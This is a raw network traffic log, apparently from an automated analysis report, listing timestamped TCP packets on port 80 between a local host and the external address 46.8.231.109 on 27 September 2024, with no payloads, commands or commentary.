Sep 27, 2024 00:15:05.613957882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613970995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613985062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613990068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613990068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613990068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613990068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613990068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613990068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.614000082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.614002943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.614015102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.614032984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.614042044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.614051104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.614145994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.614160061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.614192009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.614192963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.618823051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.618846893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.618874073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.618896008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.618946075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.618961096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.618976116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.618984938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.618997097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619015932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619049072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619065046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619080067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619090080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619095087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619108915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619122982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619139910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619206905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619223118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619239092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619242907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619254112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619256973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619268894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619275093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619286060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619292021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619302988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619309902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619327068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619340897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619362116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619376898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619398117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619405031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619407892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619421005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619436979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619452000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619494915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619512081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619527102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619529009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619539976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619543076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619554996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619560003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619571924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619582891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619594097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619615078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619684935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619699955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619715929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619729042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619729996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619738102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619748116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619750023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619765043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619772911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619781971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619788885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619802952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619807005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619820118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619829893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619837046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619843006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619853020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619859934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619867086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619868994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619884968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619893074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619899988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619901896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619915009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619920969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619929075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619940042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619951963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.619956970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619971991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.619982958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.620045900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.620062113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.620088100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.620111942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.647479057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.652401924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.818850040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.818908930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.818929911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.818943977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.818954945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.818994999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.818994999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819031000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819036961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819070101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819078922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819119930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819128036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819160938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819173098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819194078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819209099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819226980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819238901 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819271088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819278955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819310904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819319010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819344044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819351912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819375038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819390059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819418907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819442034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819482088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819489956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819524050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819528103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819555998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819564104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819587946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819593906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819621086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819632053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819658995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819664955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819690943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819705009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819724083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819730997 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819765091 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819791079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819823027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819835901 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819855928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819865942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819886923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819896936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819921017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819952965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.819953918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819962978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.819993973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820003033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820034981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820046902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820065975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820086956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820101976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820106030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820137024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820148945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820180893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820192099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820214033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820223093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820246935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820262909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820291042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820301056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820333958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820346117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820365906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820379972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820399046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820410013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820430994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820441961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820463896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820477009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820496082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820502996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820528030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820538044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820560932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820569038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820594072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820600986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820625067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820635080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820658922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820667028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820689917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820698977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820722103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820729017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820754051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820761919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820785999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.820792913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.820827961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905631065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905695915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905746937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905778885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905796051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905797958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905827999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905843019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905862093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905874014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905900955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905910015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905942917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.905956030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905989885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.905996084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906029940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906042099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906074047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906080961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906114101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906126976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906152010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906177044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906213045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906219006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906245947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906260967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906277895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906282902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906308889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906316042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906341076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906354904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906373024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906387091 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906407118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906419039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906439066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906450033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906471968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906482935 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906503916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906516075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906537056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906548023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906569004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906580925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906601906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906611919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906636953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906645060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906672001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906683922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906703949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906714916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906737089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906749964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906769991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906779051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906802893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906812906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906836033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906847000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906867981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906878948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906899929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906912088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906934977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.906945944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.906977892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907004118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907036066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907048941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907068014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907083035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907114029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907119036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907161951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907182932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907217026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907228947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907250881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907263041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907283068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907294989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907315016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907326937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907346964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907357931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907378912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907401085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907427073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907430887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907465935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907478094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907497883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907510042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907530069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907541037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907562017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907574892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907594919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907607079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907623053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907641888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907655001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907665968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907687902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907699108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907718897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907732964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907751083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907763004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907783031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907800913 CEST	49708	80	192.168.2.5	46.8.231.109
